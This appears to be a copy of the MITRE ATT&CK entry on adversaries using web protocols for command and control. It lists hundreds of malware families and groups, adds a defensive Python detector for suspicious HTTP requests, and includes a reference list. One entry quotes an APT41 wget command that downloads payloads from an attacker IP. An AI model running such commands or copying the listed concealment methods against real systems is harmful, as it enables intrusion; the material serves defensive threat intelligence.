T1071.001 Web Protocols

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP/S[1] and WebSocket[3] that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Item Value
ID T1071.001
Sub-techniques T1071.001, T1071.002, T1071.003, T1071.004
Tactics TA0011
Platforms Linux, Windows, macOS
Version 1.1
Created 15 March 2020
Last Modified 11 April 2023

Procedure Examples

ID Name Description
S0066 3PARA RAT 3PARA RAT uses HTTP for command and control.1
S0065 4H RAT 4H RAT uses HTTP for command and control.1
S0469 ABK ABK has the ability to use HTTP in communications with C2.105
S1028 Action RAT Action RAT can use HTTP to communicate with C2 servers.60
S0045 ADVSTORESHELL ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.293
S0331 Agent Tesla Agent Tesla has used HTTP for C2 communications.191192
S1025 Amadey Amadey has used HTTP for C2 communications.43
S0504 Anchor Anchor has used HTTP and HTTPS in C2 communications.37
S0584 AppleJeus AppleJeus has sent data to its C2 server via POST requests.5859
S0622 AppleSeed AppleSeed has the ability to communicate with C2 over HTTP.171172
G0026 APT18 APT18 uses HTTP for C2 communications.371
G0073 APT19 APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2.353354
G0007 APT28 Later implants used by APT28, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.133349
G0050 APT32 APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.366169
G0064 APT33 APT33 has used HTTP for command and control.335
G0067 APT37 APT37 uses HTTPS to conceal C2 communications.378
G0082 APT38 APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.326
G0087 APT39 APT39 has used HTTP in communications with C2.344345
G0096 APT41 APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.367
S0456 Aria-body Aria-body has used HTTP in C2 communications.225
S1029 AuTo Stealer AuTo Stealer can use HTTP to communicate with its C2 servers.60
S0473 Avenger Avenger has the ability to use HTTP in communication with C2.105
S0475 BackConfig BackConfig has the ability to use HTTPS for C2 communications.137
S0031 BACKSPACE BACKSPACE uses HTTP as a transport to communicate with its command server.27
S0128 BADNEWS BADNEWS establishes a backdoor over HTTP.244
S0337 BadPatch BadPatch uses HTTP for C2.46
S0239 Bankshot Bankshot uses HTTP for command and control communication.57
S0534 Bazar Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.144146145
S0470 BBK BBK has the ability to use HTTP in communications with C2.105
S0127 BBSRAT BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.217
S0268 Bisonal Bisonal has used HTTP for C2 communications.249250
G1002 BITTER BITTER has used HTTP POST requests for C2.347346
S0089 BlackEnergy BlackEnergy communicates with its C2 server over HTTP.257
S0564 BlackMould BlackMould can send commands to C2 in the body of HTTP POST requests.196
S0520 BLINDINGCAN BLINDINGCAN has used HTTPS over port 443 for command and control.31
S0657 BLUELIGHT BLUELIGHT can use HTTP/S for C2 using the Microsoft Graph API.118
S0635 BoomBox BoomBox has used HTTP POST requests for C2.116
G0060 BRONZE BUTLER BRONZE BUTLER malware has used HTTP for C2.159
S1063 Brute Ratel C4 Brute Ratel C4 can use HTTPS and HTTPS for C2 communication.78
S0043 BUBBLEWRAP BUBBLEWRAP can communicate using HTTP or HTTPS.136
S0482 Bundlore Bundlore uses HTTP requests for C2.30
C0017 C0017 During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.202
C0018 C0018 During C0018, the threat actors used HTTP for C2 communications.381
C0021 C0021 During C0021, the threat actors used HTTP for some of their C2 communications.380
S0030 Carbanak The Carbanak malware communicates to its command server using HTTP with an encrypted payload.84
S0484 Carberp Carberp has connected to C2 servers via HTTP.230
S0335 Carbon Carbon can use HTTP in C2 communications.291
S0348 Cardinal RAT Cardinal RAT is downloaded using HTTP over port 443.66
S0631 Chaes Chaes has used HTTP for C2 communications.117
S0674 CharmPower CharmPower can use HTTP to communicate with C2.103
S0144 ChChes ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.109110
G0114 Chimera Chimera has used HTTPS for C2 communications.336
S0020 China Chopper China Chopper’s server component executes code sent via HTTP POST commands.296
S0023 CHOPSTICK Various implementations of CHOPSTICK communicate with C2 over HTTP.200
S0660 Clambling Clambling has the ability to communicate over HTTP.45
S0054 CloudDuke One variant of CloudDuke uses HTTP and HTTPS for C2.28
G0080 Cobalt Group Cobalt Group has used HTTPS for C2.85351352
S0154 Cobalt Strike Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.127126128125
S0244 Comnie Comnie uses HTTP for C2 communication.215
S0126 ComRAT ComRAT has used HTTP requests for command and control.106107108
G0142 Confucius Confucius has used HTTP for C2 communications.318
S0137 CORESHELL CORESHELL can communicate over HTTP for C2.133132
S0050 CosmicDuke CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.28123
S0046 CozyCar CozyCar’s main method of communicating with its C2 servers is using HTTP or HTTPS.274
S1023 CreepyDrive CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.73
S1024 CreepySnail CreepySnail can use HTTP for C2.73
S0115 Crimson Crimson can use a HTTP GET request to download its final payload.61
S0538 Crutch Crutch has conducted C2 communications with a Dropbox account using the HTTP API.138
S0527 CSPY Downloader CSPY Downloader can use GET requests to download additional payloads from C2.6
S0687 Cyclops Blink Cyclops Blink can download files via HTTP and HTTPS.3233
S0497 Dacls Dacls can use HTTPS in C2 communications.113114
S1014 DanBot DanBot can use HTTP in C2 communication.279
G0070 Dark Caracal Dark Caracal’s version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string “&&&”.310
S0334 DarkComet DarkComet can use HTTP for C2 communications.155
S1066 DarkTortilla DarkTortilla has used HTTP and HTTPS for C2.239
S0673 DarkWatchman DarkWatchman uses HTTPS for command and control.216
S0187 Daserf Daserf uses HTTP for C2.159
S0243 DealersChoice DealersChoice uses HTTP for communication with the C2 server.158
S0616 DEATHRANSOM DEATHRANSOM can use HTTPS to download files.304
S0659 Diavol Diavol has used HTTP GET and POST requests for C2.201
S0200 Dipsind Dipsind uses HTTP for C2.29
S0600 Doki Doki has communicated with C2 over HTTPS.22
S0695 Donut Donut can use HTTP to download previously staged shellcode payloads.9
S0472 down_new down_new has the ability to use HTTP in C2 communications.105
S0186 DownPaper DownPaper communicates to its C2 server over HTTP.151
S0694 DRATzarus DRATzarus can use HTTP or HTTPS for C2 communications.227
S0384 Dridex Dridex has used POST requests and HTTPS for C2 communications.189190
S0502 Drovorub Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.166
S0062 DustySky DustySky has used both HTTP and HTTPS for C2.47
S0024 Dyre Dyre uses HTTPS for C2 communications.242243
S0554 Egregor Egregor has communicated with its C2 servers via HTTPS protocol.100
S0081 Elise Elise communicates over HTTP or HTTPS for C2.301
S0064 ELMER ELMER uses HTTP for command and control.150
S0082 Emissary Emissary uses HTTP or HTTPS for C2.120
S0363 Empire Empire can conduct command and control over protocols like HTTP and HTTPS.13
S0091 Epic Epic uses HTTP and HTTPS for C2 communications.153154
S0396 EvilBunny EvilBunny has executed C2 commands directly via HTTP.211
S0401 Exaramel for Linux Exaramel for Linux uses HTTPS for C2 communications.7879
S0569 Explosive Explosive has used HTTP for communication.173
S0512 FatDuke FatDuke can be controlled via a custom C2 protocol over HTTP.177
S0171 Felismus Felismus uses HTTP for C2.111
S0267 FELIXROOT FELIXROOT uses HTTP and HTTPS to communicate with the C2 server.308165
G0085 FIN4 FIN4 has used HTTP POST requests to transmit data.361360
G0061 FIN8 FIN8 has used HTTPS for command and control.327
S0355 Final1stspy Final1stspy uses HTTP for C2.252
S0696 Flagpro Flagpro can communicate with its C2 using HTTP.232
S0381 FlawedAmmyy FlawedAmmyy has used HTTP for C2.302
S0661 FoggyWeb FoggyWeb has the ability to communicate with C2 servers over HTTP GET/POST requests.288
C0001 Frankenstein During Frankenstein, the threat actors used HTTP GET requests for C2.386
G0047 Gamaredon Group Gamaredon Group has used HTTP and HTTPS for C2 communications.188321319322320323
S0168 Gazer Gazer communicates with its C2 servers over HTTP.101
S0666 Gelsemium Gelsemium can use HTTP/S in C2 communications.207
S0049 GeminiDuke GeminiDuke uses HTTP and HTTPS for command and control.28
S0460 Get2 Get2 has the ability to use HTTP to send information collected from an infected host to C2.303
S0249 Gold Dragon Gold Dragon uses HTTP for communication to the control servers.140
S0493 GoldenSpy GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication.143
S0597 GoldFinder GoldFinder has used HTTP for C2.129
S0588 GoldMax GoldMax has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.129254
S0477 Goopy Goopy has the ability to communicate with its C2 over HTTP.169
S0531 Grandoreiro Grandoreiro has the ability to use HTTP in C2 communications.9798
S0237 GravityRAT GravityRAT uses HTTP for C2.62
S0342 GreyEnergy GreyEnergy uses HTTP and HTTPS for C2 communications.165
S0632 GrimAgent GrimAgent has the ability to use HTTP for C2 communications.273
S0561 GuLoader GuLoader can use HTTP to retrieve additional binaries.130131
G0125 HAFNIUM HAFNIUM has used open-source C2 frameworks, including Covenant.348
S0037 HAMMERTOSS The “Uploader” variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.51
S0391 HAWKBALL HAWKBALL has used HTTP to communicate with a single hard-coded C2 server.246
S0170 Helminth Helminth can use HTTP for C2.284
S0087 Hi-Zor Hi-Zor communicates with its C2 server over HTTPS.300
G0126 Higaisa Higaisa used HTTP and HTTPS to send data back to its C2 server.372373
S0009 Hikit Hikit has used HTTP for C2.119
S0070 HTTPBrowser HTTPBrowser has used HTTP and HTTPS for command and control.180253
S0068 httpclient httpclient uses HTTP for command and control.1
S0398 HyperBro HyperBro has used HTTPS for C2 communications.174
S1022 IceApple IceApple can use HTTP GET to request and pull information from C2.70
S0483 IcedID IcedID has used HTTPS in communications with C2.299
G0100 Inception Inception has used HTTP, HTTPS, and WebDav in network communications.338218
S0604 Industroyer Industroyer’s main backdoor connected to a remote C2 server using HTTPS.76
S0260 InvisiMole InvisiMole uses HTTP for C2 communications.91
S0015 Ixeshe Ixeshe uses HTTP for command and control.289290
S0044 JHUHUGIT JHUHUGIT variants have communicated with C2 servers over HTTP and HTTPS.394041
S0265 Kazuar Kazuar uses HTTP and HTTPS to communicate with the C2 server. Kazuar can also act as a webserver and listen for inbound HTTP requests through an exposed API.280
G0004 Ke3chang Ke3chang malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2.324240
S1020 Kevin Variants of Kevin can communicate with C2 over HTTP.77
S0276 Keydnap Keydnap uses HTTPS for command and control.42
S1051 KEYPLUG KEYPLUG has the ability to communicate over HTTP and WebSocket Protocol (WSS) for C2.202
S0526 KGH_SPY KGH_SPY can send data to C2 with HTTP POST requests.6
G0094 Kimsuky Kimsuky has used HTTP GET and POST requests for C2.312
S0599 Kinsing Kinsing has communicated with C2 over HTTP.272
S0250 Koadic Koadic has used HTTP for C2 communications.4
S0162 Komplex The Komplex C2 channel uses HTTP POST requests.56
S0356 KONNI KONNI has used HTTP POST for C2.212213
G0032 Lazarus Group Lazarus Group has conducted C2 over HTTP and HTTPS.317113114316315314
S0513 LiteDuke LiteDuke can use HTTP GET requests in C2 communications.177
S0680 LitePower LitePower can use HTTP and HTTPS for C2 communications.226
S0447 Lokibot Lokibot has used HTTP for C2 communications.6869
S0582 LookBack LookBack’s C2 proxy tool sends data to a C2 server over HTTP.156
S0042 LOWBALL LOWBALL command and control occurs via HTTPS over port 443.136
G1014 LuminousMoth LuminousMoth has used HTTP for C2.370
S0409 Machete Machete uses HTTP for Command & Control.193194195
S0282 MacSpy MacSpy uses HTTP for command and control.256
S1060 Mafalda Mafalda can use HTTP for C2.71
G0059 Magic Hound Magic Hound has used HTTP for C2.364363362
S0652 MarkiRAT MarkiRAT can initiate communication over HTTP/HTTPS for its C2 server.268
S0449 Maze Maze has communicated to hard-coded IP addresses via HTTP.278
S0500 MCMD MCMD can use HTTPS in communication with C2 web servers.18
S0459 MechaFlounder MechaFlounder has the ability to use HTTP in communication with C2.35
G1013 Metador Metador has used HTTP for C2.71
S1059 metaMain metaMain can use HTTP for C2 communications.7172
S0455 Metamorfo Metamorfo has used HTTP for C2.247248
S0339 Micropsia Micropsia uses HTTP and HTTPS for C2 network communications.6364
S1015 Milan Milan can use HTTPS for communication with C2.12277121
S0051 MiniDuke MiniDuke uses HTTP and HTTPS for command and control.28177
S0084 Mis-Type Mis-Type network traffic can communicate over HTTP.147
S1026 Mongall Mongall can use HTTP for C2 communication.102
S0284 More_eggs More_eggs uses HTTPS for C2.8586
S1047 Mori Mori can communicate using HTTP over IPv4 or IPv6 depending on a flag set.65
G0069 MuddyWater MuddyWater has used HTTP for C2 communications.33412
G0129 Mustang Panda Mustang Panda has communicated with its C2 via HTTP POST requests.328329330331
S0699 Mythic Mythic supports HTTP-based C2 profiles.5
S0691 Neoichor Neoichor can use HTTP for C2 communications.240
S0034 NETEAGLE NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request. NETEAGLE will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.27
S0198 NETWIRE NETWIRE has the ability to communicate over HTTP.297298
C0002 Night Dragon During Night Dragon, threat actors used HTTP for C2.382
S0385 njRAT njRAT has used HTTP for C2 communications.134
S0353 NOKKI NOKKI has used HTTP for C2 communications.245
S0340 Octopus Octopus has used HTTP GET and POST requests for C2 communications.262261
G0049 OilRig OilRig has used HTTP for C2.369276368
S0439 Okrum Okrum uses HTTP for communication with its C2.307
S0138 OLDBAIT OLDBAIT can use HTTP for C2.133
S0052 OnionDuke OnionDuke uses HTTP and HTTPS for C2.28
S0264 OopsIE OopsIE uses HTTP for C2 communications.160161
C0012 Operation CuckooBees During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.383
C0022 Operation Dream Job During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.385
C0014 Operation Wocao During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS.379
G0071 Orangeworm Orangeworm has used HTTP for C2.357
S0352 OSX_OCEANLOTUS.D OSX_OCEANLOTUS.D can use HTTP POST and GET requests to send and receive C2 information.170
S0594 Out1 Out1 can use HTTP and HTTPS in communications with remote hosts.12
S1017 OutSteel OutSteel has used HTTP for C2 communications.24
S0072 OwaAuth OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.180
S0598 P.A.S. Webshell P.A.S. Webshell can issue commands via HTTP POST.79
S0664 Pandora Pandora can communicate over HTTP.20
S1050 PcShare PcShare has used HTTP for C2 communication.14
S0643 Peppy Peppy can use HTTP to communicate with C2.61
S0048 PinchDuke PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.28
S1031 PingPull A PingPull variant can communicate with its C2 servers by using HTTPS.277
S0435 PLEAD PLEAD has used HTTP for communications with command and control (C2) servers.141142
S0013 PlugX PlugX can be configured to use HTTP for command and control.180237
S0067 pngdowner pngdowner uses HTTP for command and control.1
S0428 PoetRAT PoetRAT has used HTTP and HTTPS for C2 communications.238
S0518 PolyglotDuke PolyglotDuke has used HTTP GET requests in C2 communications.177
S0453 Pony Pony has sent collected information to the C2 via HTTP POST request.124
S0378 PoshC2 PoshC2 can use protocols like HTTP/HTTPS for command and control traffic.11
S0441 PowerShower PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.218
S0371 POWERTON POWERTON has used HTTP/HTTPS for C2 traffic.67
S1046 PowGoop PowGoop can send HTTP GET requests to malicious servers.99
S0184 POWRUNER POWRUNER can use HTTP for C2 communications.275276
S0238 Proxysvc Proxysvc uses HTTP over SSL to communicate commands with the control server.157
S0078 Psylo Psylo uses HTTPS for C2.115
S0147 Pteranodon Pteranodon can use HTTP for C2.188
S0196 PUNCHBUGGY PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests.208209210
S0192 Pupy Pupy can communicate over HTTP for C2.10
S0650 QakBot QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.525354
S0269 QUADAGENT QUADAGENT uses HTTPS and HTTP for C2 communications.152
S0686 QuietSieve QuietSieve can use HTTPS in C2 communications.187
S0629 RainyDay RainyDay can use HTTP in C2 communications.81
S0458 Ramsay Ramsay has used HTTP for C2.199
G0075 Rancor Rancor has used HTTP for C2.337
S0241 RATANKBA RATANKBA uses HTTP/HTTPS for command and control communication.178179
S0662 RCSession RCSession can use HTTP in C2 communications.4544
S0495 RDAT RDAT can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.80
S0172 Reaver Some Reaver variants use HTTP for C2.34
S0153 RedLeaves RedLeaves can communicate to its C2 over HTTP and HTTPS if directed.21236
S0019 Regin The Regin malware platform supports many standard protocols, including HTTP and HTTPS.205
S0375 Remexi Remexi uses BITSAdmin to communicate with the C2 server over HTTP.38
S0125 Remsec Remsec is capable of using HTTP and HTTPS for C2.258259260
S0496 REvil REvil has used HTTP and HTTPS in communication with C2.182183184185186
S0258 RGDoor RGDoor uses HTTP for C2 communications.104
S0003 RIPTIDE APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.229
S0448 Rising Sun Rising Sun has used HTTP and HTTPS for command and control.294
G0106 Rocke Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.359
S0240 ROKRAT ROKRAT can use HTTP and HTTPS for command and control communication.269270271
S0148 RTM RTM has initiated connections to external domains using HTTPS.306
S0085 S-Type S-Type uses HTTP for C2.147
S1018 Saint Bot Saint Bot has used HTTP for C2 communications.167
S0074 Sakula Sakula uses HTTP for C2.25
G0034 Sandworm Team Sandworm Team’s BCS-server tool connects to the designated C2 server via HTTP.355
S0053 SeaDuke SeaDuke uses HTTP and HTTPS for C2.28
S0345 Seasalt Seasalt uses HTTP for C2 communications.23
S0382 ServHelper ServHelper uses HTTP for C2.204
S0596 ShadowPad ShadowPad communicates over HTTP to retrieve a string that is decoded into a C2 server URL.295
S0140 Shamoon Shamoon has used HTTP for C2.285
S1019 Shark Shark has the ability to use HTTP in C2 communications.122121
S0444 ShimRat ShimRat communicated over HTTP and HTTPS with C2 servers.19
S0445 ShimRatReporter ShimRatReporter communicated over HTTP with preconfigured C2 servers.19
S0589 Sibot Sibot communicated with its C2 server via HTTP GET requests.129
S0610 SideTwist SideTwist has used HTTP GET and POST requests over port 443 for C2.251
G0121 Sidewinder Sidewinder has used HTTP in C2 communications.339340341
G0083 SilverTerrier SilverTerrier uses HTTP for C2 communications.358
S0633 Sliver Sliver has the ability to support C2 communications over HTTP/S.151617
S0533 SLOTHFULMEDIA SLOTHFULMEDIA has used HTTP and HTTPS for C2 communications.162
S1035 Small Sieve Small Sieve can contact actor-controlled C2 servers by using the Telegram API over HTTPS.65
S0226 Smoke Loader Smoke Loader uses HTTP for C2.55
S0649 SMOKEDHAM SMOKEDHAM has communicated with its C2 servers via HTTPS and HTTP POST requests.168
S0159 SNUGRIDE SNUGRIDE communicates with its C2 server over HTTP.21
C0024 SolarWinds Compromise During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration.384
S0516 SoreFang SoreFang can use HTTP in C2 communications.25590
S0543 Spark Spark has used HTTP POST requests to communicate with its C2 server to receive commands.286
S0374 SpeakUp SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server.95
S1030 Squirrelwaffle Squirrelwaffle has used HTTP POST requests for C2 communications.206
S1037 STARWHALE STARWHALE has the ability to contact actor-controlled C2 servers via HTTP.28365
G0038 Stealth Falcon Stealth Falcon malware communicates with its C2 server via HTTPS.325
S0491 StrongPity StrongPity can use HTTP and HTTPS in C2 communications.234235
S0603 Stuxnet Stuxnet uses HTTP to communicate with a command and control server.198
S1042 SUGARDUMP A SUGARDUMP variant has used HTTP for C2.267
S0559 SUNBURST SUNBURST communicated via HTTP GET or HTTP POST requests to third party servers for C2.149
S0578 SUPERNOVA SUPERNOVA had to receive an HTTP GET request containing a specific set of parameters in order to execute.4849
S1064 SVCReady SVCReady can communicate with its C2 servers via HTTP.96
S0060 Sys10 Sys10 uses HTTP for C2.181
G0092 TA505 TA505 has used HTTP to communicate with C2 nodes.350
G0127 TA551 TA551 has used HTTP for C2 communications.164
S0011 Taidoor Taidoor has used HTTP GET and POST requests for C2.203
G0139 TeamTNT TeamTNT has used the curl command to send credentials over HTTP and the curl and wget commands to download new software.377374375 TeamTNT has also used a custom user agent HTTP header in shell scripts.376
S0595 ThiefQuest ThiefQuest uploads files via unencrypted HTTP.9394
G0027 Threat Group-3390 Threat Group-3390 malware has used HTTP for C2.365
S0668 TinyTurla TinyTurla can use HTTPS in C2 communications.231
S0671 Tomiris Tomiris can use HTTP to establish C2 communications.92
S0678 Torisma Torisma can use HTTP and HTTPS for C2 communications.112
S0682 TrailBlazer TrailBlazer has used HTTP requests for C2.263
S0266 TrickBot TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.3637
S0094 Trojan.Karagany Trojan.Karagany can communicate with C2 via HTTP POST requests.135
G0081 Tropic Trooper Tropic Trooper has used HTTP in communication with the C2.332333
S0436 TSCookie TSCookie can use multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.7475
S0647 Turian Turian has the ability to use HTTP for its C2.228
G0010 Turla Turla has used HTTP and HTTPS for C2 communications.342343
S0333 UBoatRAT UBoatRAT has used HTTP for C2 communications.309
S0275 UPPERCUT UPPERCUT has used HTTP for C2, including sending error codes in Cookie headers.139
S0386 Ursnif Ursnif has used HTTPS for C2.264265266
S0476 Valak Valak has used HTTP in communications with C2.163164
S0636 VaporRage VaporRage can use HTTP to download shellcode from compromised websites.116
S0207 Vasport Vasport creates a backdoor by making a connection using a HTTP POST.241
S0442 VBShower VBShower has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.292
S0257 VERMIN VERMIN uses HTTP for C2 communications.233
S0514 WellMess WellMess can use HTTP and HTTPS in C2 communications.87888990
S0689 WhisperGate WhisperGate can make an HTTPS connection to download additional files.175176
G0112 Windshift Windshift has used tools that communicate with C2 over HTTP.311
S0466 WindTail WindTail has the ability to use HTTP for C2 communications.281
S0059 WinMM WinMM uses HTTP for C2.181
S0430 Winnti for Linux Winnti for Linux has used HTTP in outbound communications.148
S0141 Winnti for Windows Winnti for Windows has the ability to use encapsulated HTTP/S in C2 communications.26
G0090 WIRTE WIRTE has used HTTP for network communication.313
G0102 Wizard Spider Wizard Spider has used HTTP for network communications.356
S1065 Woody RAT Woody RAT can communicate with its C2 server using HTTP requests.197
S0341 Xbash Xbash uses HTTP for C2 communications.214
S0653 xCaon xCaon has communicated with the C2 server by sending POST requests over HTTP.282
S0388 YAHOYAH YAHOYAH uses HTTP for C2.305
S0251 Zebrocy Zebrocy uses HTTP for C2.219220221222223224
S0230 ZeroT ZeroT has used HTTP for C2.8283
S0330 Zeus Panda Zeus Panda uses HTTP for C2 communications.287
S0086 ZLib ZLib communicates over HTTP for C2.147
S0412 ZxShell ZxShell has used HTTP for C2 connections.50

Mitigations

ID Mitigation Description
M1031 Network Intrusion Prevention Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.

Detection

ID Data Source Data Component
DS0029 Network Traffic Network Traffic Content
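
The mitigation and detection entries above both depend on inspecting network traffic content. As an added example (not part of the ATT&CK page or of any vendor signature set), the Python below applies three content checks taken from behaviours in the procedure table: a Base64 body suffixed with "&&&" (Dark Caracal's Bandook), data carried in Cookie headers (ChChes, GoldMax, UPPERCUT), and an HTTP Upgrade request opening a WebSocket (Drovorub). The hostnames, cookie baseline, allowlist, length threshold and sample requests are constructed assumptions, and the checks only see plaintext HTTP or traffic already decrypted at an inspecting proxy.

```python
import base64
import binascii
import re

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")

# Assumed local baselines (hypothetical hosts and cookie names).
KNOWN_COOKIES = {"intranet.example": {"sessionid", "csrftoken"}}
WEBSOCKET_ALLOWLIST = {"chat.intranet.example"}


def parse_request(raw):
    """Split a plaintext HTTP/1.x request into method, path, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def is_base64(text, min_len=32):
    """True if text has at least min_len chars and strictly decodes as Base64."""
    if len(text) < min_len or len(text) % 4 or not B64_RE.fullmatch(text):
        return False
    try:
        base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def inspect(raw):
    """Return the names of the rules that fire for one request."""
    _method, _path, headers, body = parse_request(raw)
    host = headers.get("host", "")
    findings = []

    # Rule 1: Base64 body suffixed with "&&&" (Dark Caracal / Bandook entry).
    if body.endswith("&&&") and is_base64(body[:-3]):
        findings.append("b64-body-triple-ampersand")

    # Rule 2: long Base64 value in a cookie this site is not known to set
    # (data carried in Cookie headers: ChChes, GoldMax, UPPERCUT entries).
    expected = KNOWN_COOKIES.get(host, set())
    for pair in headers.get("cookie", "").split(";"):
        name, _, value = pair.strip().partition("=")
        if name and name not in expected and is_base64(value):
            findings.append("opaque-cookie:" + name)

    # Rule 3: WebSocket handshake to a host outside the allowlist
    # (HTTP Upgrade request: Drovorub entry).
    is_ws = headers.get("upgrade", "").lower() == "websocket"
    if is_ws and host not in WEBSOCKET_ALLOWLIST:
        findings.append("websocket-upgrade-unlisted-host")
    return findings


def build(lines, body=""):
    """Assemble a request string with CRLF line endings."""
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Constructed sample data: no real malware traffic is reproduced here.
BLOB = base64.b64encode(b"constructed sample bytes, not captured traffic").decode()

SAMPLES = {
    "suffix_body": build(
        ["POST /upload HTTP/1.1", "Host: files.example.net"], BLOB + "&&&"),
    "cookie_carrier": build(
        ["GET /index.html HTTP/1.1", "Host: intranet.example",
         "Cookie: sessionid=abc123; uid=" + BLOB]),
    "ws_upgrade": build(
        ["GET /socket HTTP/1.1", "Host: updates.example.org",
         "Upgrade: websocket", "Connection: Upgrade"]),
    # Long Base64 session cookie, but under a name the site is known to set.
    "benign": build(
        ["GET /home HTTP/1.1", "Host: intranet.example",
         "Cookie: sessionid=" + BLOB + "; csrftoken=x9f2"]),
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(label, inspect(request))
```

The benign sample shows why rule 2 is tied to a per-site cookie baseline: long Base64 cookie values are normal for session handling, so the value's shape alone is not a usable signal.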

References


  1. Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016. 

  2. Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. 

  3. Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023. 

  4. Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. 

  5. Thomas, C. (n.d.). Mythic Documentation. Retrieved March 25, 2022. 

  6. Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020. 

  7. Harbison, M. and Renals, P. (2022, July 5). When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors. Retrieved February 1, 2023. 

  8. Kenefick, I. et al. (2022, October 12). Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike. Retrieved February 6, 2023. 

  9. TheWover. (2019, May 9). donut. Retrieved March 25, 2022. 

  10. Nicolas Verdier. (n.d.). Retrieved January 29, 2018. 

  11. Nettitude. (2018, July 23). Python Server for PoshC2. Retrieved April 23, 2019. 

  12. Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021. 

  13. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. 

  14. Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022. 

  15. NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021. 

  16. Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021. 

  17. BishopFox. (n.d.). Sliver. Retrieved September 15, 2021. 

  18. Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020. 

  19. Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020. 

  20. Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021. 

  21. FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017. 

  22. Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021. 

  23. Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016. 

